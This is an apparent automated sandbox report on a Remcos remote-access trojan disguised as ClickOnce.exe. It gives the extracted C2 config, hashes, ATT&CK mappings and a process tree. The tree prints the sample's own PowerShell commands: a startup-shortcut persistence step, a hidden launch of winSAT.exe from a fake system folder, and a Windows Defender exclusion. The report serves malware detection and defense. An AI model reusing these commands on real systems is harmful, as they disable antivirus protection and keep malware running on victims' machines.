remcos | 00e5e4c53c99d62c722b309b6e394e3c53d47a23406730433b4aaf928e06512d

Analysis

max time kernel
147s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
27/11/2024, 16:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ClickOnce.exe
Size

180.1MB
MD5

90c90ae9ca3326adde8abb132de3d3d6
SHA1

ad9c8be767ca9c77c01bc6b2302ff5bdd9dabc2b
SHA256

62de1f18b5371f4b78569790710a67356818f6473832694a901f3e34c8b0051e
SHA512

471ee634ab44dd323ca0a5e8d7ef3f68d66be5bc7889e4cd2d54e05a53f35de47db809604011271af07ff07e0cddddd9b7e0d16d8ab88efc88c5f1ca5cb2345d
SSDEEP

1572864:lwl41lgY+w9QLv1JWYc6UeOtUUGQUT1jdu4BPPuuwT2GOqiB1sr7zjg7ob753oUV:7F4oD0QdG09P

Score

10^/10

remcos remotehost discovery execution ransomware rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

65.108.68.57:2404

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-PYIE9F
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1164	powershell.exe
2580	powershell.exe
4968	powershell.exe
1688	powershell.exe
1992	powershell.exe
1688	powershell.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk	powershell.exe

Executes dropped EXE 3 IoCs

pid	Process
2876	winSAT.exe
2364	winSAT.exe
4156	Bginfo.exe

Loads dropped DLL 3 IoCs

pid	Process
2876	winSAT.exe
2364	winSAT.exe
4156	Bginfo.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\BGInfo.bmp"	Bginfo.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Performance\WinSAT\winsat.log	winSAT.exe
File opened for modification	C:\Windows\Performance\WinSAT\winsat.log	winSAT.exe

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bginfo.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Bginfo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Bginfo.exe

Modifies Control Panel 2 IoCs

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\Desktop\TileWallpaper = "1"	Bginfo.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\Desktop\WallpaperStyle = "0"	Bginfo.exe

Modifies registry class 10 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\BGInfo.Config.1\shell	Bginfo.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\BGInfo.Config.1\shell\open	Bginfo.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\BGInfo.Config.1\DefaultIcon	Bginfo.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\.bgi\ = "BGInfo.Config.1"	Bginfo.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\BGInfo.Config.1	Bginfo.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\BGInfo.Config.1\shell\open\command	Bginfo.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\BGInfo.Config.1\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\MyElectronApp\\Bginfo.exe\",0"	Bginfo.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\.bgi	Bginfo.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\BGInfo.Config.1\ = "BGInfo Configuration File"	Bginfo.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\BGInfo.Config.1\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\MyElectronApp\\Bginfo.exe\" \"%1\""	Bginfo.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
4968	powershell.exe
1164	powershell.exe
1164	powershell.exe
4968	powershell.exe
1688	powershell.exe
1688	powershell.exe
1992	powershell.exe
1992	powershell.exe
2580	powershell.exe
2580	powershell.exe

Suspicious use of AdjustPrivilegeToken 27 IoCs

description	pid	Process
Token: SeDebugPrivilege	4968	powershell.exe
Token: SeDebugPrivilege	1164	powershell.exe
Token: SeShutdownPrivilege	2476	ClickOnce.exe
Token: SeCreatePagefilePrivilege	2476	ClickOnce.exe
Token: SeDebugPrivilege	1688	powershell.exe
Token: SeShutdownPrivilege	2476	ClickOnce.exe
Token: SeCreatePagefilePrivilege	2476	ClickOnce.exe
Token: SeShutdownPrivilege	2476	ClickOnce.exe
Token: SeCreatePagefilePrivilege	2476	ClickOnce.exe
Token: SeShutdownPrivilege	2476	ClickOnce.exe
Token: SeCreatePagefilePrivilege	2476	ClickOnce.exe
Token: SeShutdownPrivilege	2476	ClickOnce.exe
Token: SeCreatePagefilePrivilege	2476	ClickOnce.exe
Token: SeDebugPrivilege	1992	powershell.exe
Token: SeShutdownPrivilege	2476	ClickOnce.exe
Token: SeCreatePagefilePrivilege	2476	ClickOnce.exe
Token: SeDebugPrivilege	2580	powershell.exe
Token: SeShutdownPrivilege	2476	ClickOnce.exe
Token: SeCreatePagefilePrivilege	2476	ClickOnce.exe
Token: SeShutdownPrivilege	2476	ClickOnce.exe
Token: SeCreatePagefilePrivilege	2476	ClickOnce.exe
Token: SeBackupPrivilege	4156	Bginfo.exe
Token: SeSecurityPrivilege	4156	Bginfo.exe
Token: SeShutdownPrivilege	2476	ClickOnce.exe
Token: SeCreatePagefilePrivilege	2476	ClickOnce.exe
Token: SeShutdownPrivilege	2476	ClickOnce.exe
Token: SeCreatePagefilePrivilege	2476	ClickOnce.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4156	Bginfo.exe

Suspicious use of WriteProcessMemory 55 IoCs

description	pid	Process	procid_target
PID 2476 wrote to memory of 4844	2476	ClickOnce.exe	84
PID 2476 wrote to memory of 4844	2476	ClickOnce.exe	84
PID 2476 wrote to memory of 4828	2476	ClickOnce.exe	83
PID 2476 wrote to memory of 4828	2476	ClickOnce.exe	83
PID 2476 wrote to memory of 4828	2476	ClickOnce.exe	83
PID 2476 wrote to memory of 4828	2476	ClickOnce.exe	83
PID 2476 wrote to memory of 4828	2476	ClickOnce.exe	83
PID 2476 wrote to memory of 4828	2476	ClickOnce.exe	83
PID 2476 wrote to memory of 4828	2476	ClickOnce.exe	83
PID 2476 wrote to memory of 4828	2476	ClickOnce.exe	83
PID 2476 wrote to memory of 4828	2476	ClickOnce.exe	83
PID 2476 wrote to memory of 4828	2476	ClickOnce.exe	83
PID 2476 wrote to memory of 4828	2476	ClickOnce.exe	83
PID 2476 wrote to memory of 4828	2476	ClickOnce.exe	83
PID 2476 wrote to memory of 4828	2476	ClickOnce.exe	83
PID 2476 wrote to memory of 4828	2476	ClickOnce.exe	83
PID 2476 wrote to memory of 4828	2476	ClickOnce.exe	83
PID 2476 wrote to memory of 4828	2476	ClickOnce.exe	83
PID 2476 wrote to memory of 4828	2476	ClickOnce.exe	83
PID 2476 wrote to memory of 4828	2476	ClickOnce.exe	83
PID 2476 wrote to memory of 4828	2476	ClickOnce.exe	83
PID 2476 wrote to memory of 4828	2476	ClickOnce.exe	83
PID 2476 wrote to memory of 4828	2476	ClickOnce.exe	83
PID 2476 wrote to memory of 4828	2476	ClickOnce.exe	83
PID 2476 wrote to memory of 4828	2476	ClickOnce.exe	83
PID 2476 wrote to memory of 4828	2476	ClickOnce.exe	83
PID 2476 wrote to memory of 4828	2476	ClickOnce.exe	83
PID 2476 wrote to memory of 4828	2476	ClickOnce.exe	83
PID 2476 wrote to memory of 4828	2476	ClickOnce.exe	83
PID 2476 wrote to memory of 4828	2476	ClickOnce.exe	83
PID 2476 wrote to memory of 4828	2476	ClickOnce.exe	83
PID 2476 wrote to memory of 4828	2476	ClickOnce.exe	83
PID 2476 wrote to memory of 3988	2476	ClickOnce.exe	86
PID 2476 wrote to memory of 3988	2476	ClickOnce.exe	86
PID 2476 wrote to memory of 4824	2476	ClickOnce.exe	87
PID 2476 wrote to memory of 4824	2476	ClickOnce.exe	87
PID 4844 wrote to memory of 1164	4844	cmd.exe	89
PID 4844 wrote to memory of 1164	4844	cmd.exe	89
PID 3988 wrote to memory of 4968	3988	cmd.exe	90
PID 3988 wrote to memory of 4968	3988	cmd.exe	90
PID 4968 wrote to memory of 2876	4968	powershell.exe	93
PID 4968 wrote to memory of 2876	4968	powershell.exe	93
PID 2876 wrote to memory of 1688	2876	winSAT.exe	95
PID 2876 wrote to memory of 1688	2876	winSAT.exe	95
PID 2476 wrote to memory of 1604	2476	ClickOnce.exe	97
PID 2476 wrote to memory of 1604	2476	ClickOnce.exe	97
PID 1604 wrote to memory of 1992	1604	cmd.exe	99
PID 1604 wrote to memory of 1992	1604	cmd.exe	99
PID 1992 wrote to memory of 2364	1992	powershell.exe	100
PID 1992 wrote to memory of 2364	1992	powershell.exe	100
PID 2364 wrote to memory of 2580	2364	winSAT.exe	102
PID 2364 wrote to memory of 2580	2364	winSAT.exe	102
PID 2580 wrote to memory of 4156	2580	powershell.exe	105
PID 2580 wrote to memory of 4156	2580	powershell.exe	105
PID 2580 wrote to memory of 4156	2580	powershell.exe	105

C:\Users\Admin\AppData\Local\Temp\ClickOnce.exe
"C:\Users\Admin\AppData\Local\Temp\ClickOnce.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2476
- C:\Users\Admin\AppData\Local\Temp\ClickOnce.exe
  "C:\Users\Admin\AppData\Local\Temp\ClickOnce.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\ClickOnce" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1756,i,2647735012830330386,13174283228275022323,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1748 /prefetch:2
  2⤵
  PID:4828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\Admin\AppData\Local\Temp\ClickOnce.exe';$s.Save()""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4844
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\Admin\AppData\Local\Temp\ClickOnce.exe';$s.Save()"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops startup file
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3988
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4968
  - - C:\Windows \System32\winSAT.exe
      "C:\Windows \System32\winSAT.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Drops file in Windows directory
      Suspicious use of WriteProcessMemory
      PID:2876
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1688
- C:\Users\Admin\AppData\Local\Temp\ClickOnce.exe
  "C:\Users\Admin\AppData\Local\Temp\ClickOnce.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\ClickOnce" --field-trial-handle=1984,i,2647735012830330386,13174283228275022323,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1828 /prefetch:3
  2⤵
  PID:4824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1604
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1992
  - - C:\Windows \System32\winSAT.exe
      "C:\Windows \System32\winSAT.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Drops file in Windows directory
      Suspicious use of WriteProcessMemory
      PID:2364
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; $BginfoPath = Join-Path $TargetPath 'Bginfo.exe'; Start-Process -FilePath $BginfoPath -ArgumentList '/NOLICPROMPT /timer:300' -WorkingDirectory $TargetPath -WindowStyle Hidden; }"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2580
      - C:\Users\Admin\AppData\Roaming\MyElectronApp\Bginfo.exe
        
        "C:\Users\Admin\AppData\Roaming\MyElectronApp\Bginfo.exe" /NOLICPROMPT /timer:300
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Sets desktop wallpaper using registry
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Modifies Control Panel
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:4156

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
5caad758326454b5788ec35315c4c304

SHA1
3aef8dba8042662a7fcf97e51047dc636b4d4724

SHA256
83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

SHA512
4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e5ea61f668ad9fe64ff27dec34fe6d2f

SHA1
5d42aa122b1fa920028b9e9514bd3aeac8f7ff4b

SHA256
8f161e4c74eb4ca15c0601ce7a291f3ee1dc0aa46b788181bfe1d33f2b099466

SHA512
cb308188323699eaa2903424527bcb40585792f5152aa7ab02e32f94a0fcfe73cfca2c7b3cae73a9df3e307812dbd18d2d50acbbfeb75d87edf1eb83dd109f34

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
15e8e1b56453645f6bbd52ce9dd3d9fd

SHA1
80c6c1e9b15de09e93c973003c70db80fa2a77a8

SHA256
d554786579a4691cfa615faf45a0d758f78d098c9ce86b123b0029824ac02d69

SHA512
03f052ed329b5b6b20782f09eaedaea04718b1c8b1ce6805987f04c23bf486d65bfb474af0ddba2fa48834a8d07bc99dff23d06f4b3ee9921cde73f7ab2e1715

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ztj55asv.rbs.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\MyElectronApp\Bginfo.exe

Filesize
2.1MB

MD5
3aef228fb7ee187160482084d36c9726

SHA1
8b76990c5061890c94f81f504c5782912a58d8a6

SHA256
c885df88693496d5c28ad16a1ecde259e191f54ad76428857742af843b846c53

SHA512
e659a7cf12c6b41879e4ce987e4cd1cefce2ffc74e06817667fa833764f36f25cc5f8374dbc844b68b787acac011c7b8c8f2b74563bf8a96f623ebb110a593da

Download Submit
C:\Users\Admin\AppData\Roaming\MyElectronApp\data.bin

Filesize
467KB

MD5
c23cda11129a0ed2722ff928b832f9bf

SHA1
bb7579a62924a4c6e3c9d8d4e8d09491c1981890

SHA256
e5338e0ad8f140989c5c3bc9b4ab178eb9c01b584e709aa079e134faaabc0fdf

SHA512
0396fbf7ff3826552ba3efdb4adc597d96539a0c084aa074504e147b3d0bc915ba50cad16b846f56ffa14d78227a263184a84b72cb3f70fa860ada7075b10d14

Download Submit
C:\Users\Admin\AppData\Roaming\MyElectronApp\version.dll

Filesize
315KB

MD5
797c95197e636714a6dd27097f080775

SHA1
fdbb456970b87372a87836346efe39004f64b99f

SHA256
bca40ec33acd2fcb680b4d39a9641888ce7b4546f41c526cc755f0a15a50e0f4

SHA512
f210d43af49ec20fc443820136c7c706fab03021cf471bc6825ce29d92d6b743205be9be7cbd015de6f12d3fb98e894df7a7165644976be47a49055ec26c10ef

Download Submit
C:\Windows \System32\VERSION.dll

Filesize
105KB

MD5
aa7457a9f158e53fa634ab3d10da9404

SHA1
2cde249d40d9ba78a46d44223fac0df0180dfd38

SHA256
cfa4d681ddbf7f90fec56e7bfa7ce4fdc7e6815471bda7dfdd4b6e41e3f7a1bd

SHA512
9da8d90a715ccfb2ad557db134301d0eaabdef34000ada10c0745a528cb3b550c69eca3782b3cfc0c766a93bd44f52ee00320dc9038ebca4dceb7e0054c6aefc

Download Submit
C:\Windows \System32\version.dll

Filesize
105KB

MD5
a3cb17567bcb27217a5c2cf7609733c7

SHA1
558cb0f479ebdd0ab15289215edab9cdddfe4aee

SHA256
48a7ae5a3ae288641a14df0da499b39a5b70432601af251ff5786d7784361b43

SHA512
d80678dd2c51b3f15c37dd5717bd106533ca1d256239608fb227863099cbde9ebc91f25082e17685aeb033557ca6e5fa0f0dc59a909ef7e36a35ed61c0b45a62

Download Submit
C:\Windows \System32\winSAT.exe

Filesize
2.7MB

MD5
715db53a8064c6deccf68b7501df3386

SHA1
99acd12c3600ad3a7c478e49126db520bc136304

SHA256
cc31fdcdce05144ef750b01233d57614cda7364a73ca26ff68886ebdc650e367

SHA512
9ba9eaefa1e2e4da2d14f12b81f2ed0597ab6eb6b32d85851b69bc86d77a6b38810a04aa35ffcbf64484d544f52960f05f4eaca4740cd3674a1d09d8b373ce3c

Download Submit
C:\Windows\Performance\WinSAT\winsat.log

Filesize
574B

MD5
283033470d274c3bdf6b4d6e2681eff0

SHA1
578ee17dc54e9320290e35b71953d4344bff6b49

SHA256
f8a6267da717fe9fc80770a00fbc7df83bd1d175ddbc4b5dd011d323ef4a7ee8

SHA512
522517098414f89ba19f9f8aa64ad7bbba4a116c6455d5d0aea8294f4918372181bfa84bbd281268a863ad06b6a1cdef39a0ccd3df97daa68d7ff37822364dfd

Download Submit
memory/4156-96-0x0000000002A60000-0x0000000002ADD000-memory.dmp

Filesize
500KB

Download
memory/4156-97-0x0000000002A60000-0x0000000002ADD000-memory.dmp

Filesize
500KB

Download
memory/4156-98-0x0000000002A60000-0x0000000002ADD000-memory.dmp

Filesize
500KB

Download
memory/4156-101-0x0000000002A60000-0x0000000002ADD000-memory.dmp

Filesize
500KB

Download
memory/4156-102-0x0000000002A60000-0x0000000002ADD000-memory.dmp

Filesize
500KB

Download
memory/4156-109-0x0000000002A60000-0x0000000002ADD000-memory.dmp

Filesize
500KB

Download
memory/4968-24-0x000001DD20580000-0x000001DD205A2000-memory.dmp

Filesize
136KB

Download